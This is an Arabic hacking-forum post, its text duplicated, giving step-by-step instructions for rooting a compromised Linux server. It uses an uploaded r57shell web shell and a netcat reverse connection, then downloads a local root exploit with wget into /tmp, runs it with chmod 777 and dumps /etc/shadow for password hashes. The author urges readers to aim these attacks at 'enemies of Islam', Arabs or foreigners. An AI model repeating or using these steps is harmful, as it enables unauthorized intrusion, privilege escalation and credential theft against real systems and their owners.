بسم الله والصلاة على رسول الله محمد صلى الله عليه وسلم
ارجو ان نستخدم ما نفهمه على اعداء الاسلام (سواء عرب او اجانب)
طبعا يوجد ثغرات تمكنك من رفع شل او باكدور وسبق ان شرحت طريقة
البحث عنها وايضا شرحت استغلالها...ولا يجاد الثغرات بالسيكويرتي راجع الموضوع هذا
من هو الهكر؟
بنشرح طريقة ((الطريقة الاولى)) لاخذ الروت
لنفرض اننا حصلنا ثغره ورفعنا شيل r57shell.php ولتحميل الشيل يوجد شلات مطوره هنا
http://forum.qebla.com/showthread.php?t=8996
اللحين نتنصت بالنت كات على بورت 9696
والبورت هذا انت بالخيار اللي تبغى بس لازم نفس عند الاتصال عن طريق الشيل
1/ضع الاي بي بتاعك
2/البورت اللي اخترنا للتنصت
3/ اتصال
والان جاري الاتصال..........
ارجع للنت كات تحصله شبك معك
ولو ما شبك معك معناته يلزمك باكدور عكسي
لو تلاحظ بعد ما شبك معنا اعطاك وضعك ومعلومات عن النظام...
وبالمناسبه لو ترجع لراس الشيل حتلاحظ نفس المعلومات...
وهنا وضعنا ((نو بدي))..طيب مو مشكله
بما انه معنا بيانات النظام((linux 2.4.28-ow1))
نذهب الى احد مواقع السيكيورتي...عن local root exploit..مطابق للنظام
وحصلنا local root exploit ..الان نسوي له ترجمه
وبعدين ترفعه لموقعك..وترجع للنت كات وتكتب الامر
wget http://www.???.com/file.zip
الـ ???اسم موقعك او الموقع اللي رافع عليه..والـfile..اسم اللوكل روت..شوف الصوره كيف رفعناه
بس ندخل لمجلد تامب بالامر
tmp/
واكتب الامر...
unzip file.zip
لفك الضغط عن الملف
واعطيه (y) للموافقه وانتر
انفك الملف
واكتب الامر
chmod 777 file
لاعطاءه التصريح 777
واخيرا اكتب الامر
file./
لتشغيل الملف...ومن ثم اكتب الامر (( id ))
وننتظر ثواني لانه احيانا بياخذ وقت
الحمدلله اشتغل واخذنا روت...واكتب الامر
cat /etc/shadow
راح يظهر لك باسورد الروت...
عموما هذه طريقه من طرق كيفيه اخذ الروت..وراح نشرح الطريقة الثانيه والثالثه
اتمنى اني قدمت ما يفيد لاخواني المسلمين
تحياتي
ارجو ان نستخدم ما نفهمه على اعداء الاسلام (سواء عرب او اجانب)
طبعا يوجد ثغرات تمكنك من رفع شل او باكدور وسبق ان شرحت طريقة
البحث عنها وايضا شرحت استغلالها...ولا يجاد الثغرات بالسيكويرتي راجع الموضوع هذا
من هو الهكر؟
بنشرح طريقة ((الطريقة الاولى)) لاخذ الروت
لنفرض اننا حصلنا ثغره ورفعنا شيل r57shell.php ولتحميل الشيل يوجد شلات مطوره هنا
http://forum.qebla.com/showthread.php?t=8996
اللحين نتنصت بالنت كات على بورت 9696
والبورت هذا انت بالخيار اللي تبغى بس لازم نفس عند الاتصال عن طريق الشيل
1/ضع الاي بي بتاعك
2/البورت اللي اخترنا للتنصت
3/ اتصال
والان جاري الاتصال..........
ارجع للنت كات تحصله شبك معك
ولو ما شبك معك معناته يلزمك باكدور عكسي
لو تلاحظ بعد ما شبك معنا اعطاك وضعك ومعلومات عن النظام...
وبالمناسبه لو ترجع لراس الشيل حتلاحظ نفس المعلومات...
وهنا وضعنا ((نو بدي))..طيب مو مشكله
بما انه معنا بيانات النظام((linux 2.4.28-ow1))
نذهب الى احد مواقع السيكيورتي...عن local root exploit..مطابق للنظام
وحصلنا local root exploit ..الان نسوي له ترجمه
وبعدين ترفعه لموقعك..وترجع للنت كات وتكتب الامر
wget http://www.???.com/file.zip
الـ ???اسم موقعك او الموقع اللي رافع عليه..والـfile..اسم اللوكل روت..شوف الصوره كيف رفعناه
بس ندخل لمجلد تامب بالامر
tmp/
واكتب الامر...
unzip file.zip
لفك الضغط عن الملف
واعطيه (y) للموافقه وانتر
انفك الملف
واكتب الامر
chmod 777 file
لاعطاءه التصريح 777
واخيرا اكتب الامر
file./
لتشغيل الملف...ومن ثم اكتب الامر (( id ))
وننتظر ثواني لانه احيانا بياخذ وقت
الحمدلله اشتغل واخذنا روت...واكتب الامر
cat /etc/shadow
راح يظهر لك باسورد الروت...
عموما هذه طريقه من طرق كيفيه اخذ الروت..وراح نشرح الطريقة الثانيه والثالثه
اتمنى اني قدمت ما يفيد لاخواني المسلمين
تحياتي